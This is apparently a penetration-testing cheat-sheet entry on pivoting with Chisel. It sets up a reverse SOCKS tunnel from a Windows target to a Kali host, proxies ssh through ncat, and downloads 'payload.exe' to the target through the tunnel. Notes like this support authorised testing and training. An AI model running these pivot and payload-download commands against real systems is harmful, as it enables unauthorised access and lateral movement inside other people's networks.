
Table of contents

  1. Exploit


Server and client can be both started with Chisel.

# Start chisel server on your Kali.
chisel server --port $lport --reverse

# Start chisel client on a Windows target.
chisel.exe client $lhost:$lport R:socks

# Modify /etc/proxychains4.conf.
socks5 1080

# Create a proxyfied ssh tunnel through the chisel client to your target.
ssh -o ProxyCommand="ncat --proxy-type socks5 --proxy$socks_port %h %p" $username@$target

You might want to reverse commands back to your server from a host that can only access your client. It could be the case if you want to download a payload which is served on your Kali with python -m http.server 80 but you can’t access by doing iwr -uri http://$lhost:80/payload.exe -outfile payload.exe. In such a case, configure a remote connection that will tunnel the commands you will send to the client back to the server.

# With chisel run like this, you can run `iwr -uri http://$client:9999/payload.exe -outfile payload.exe` from your target.
chisel.exe client $lhost:$lport R:socks$lhost:80

If you want to perform port scanning through port tunneling, you should consider using Naabu.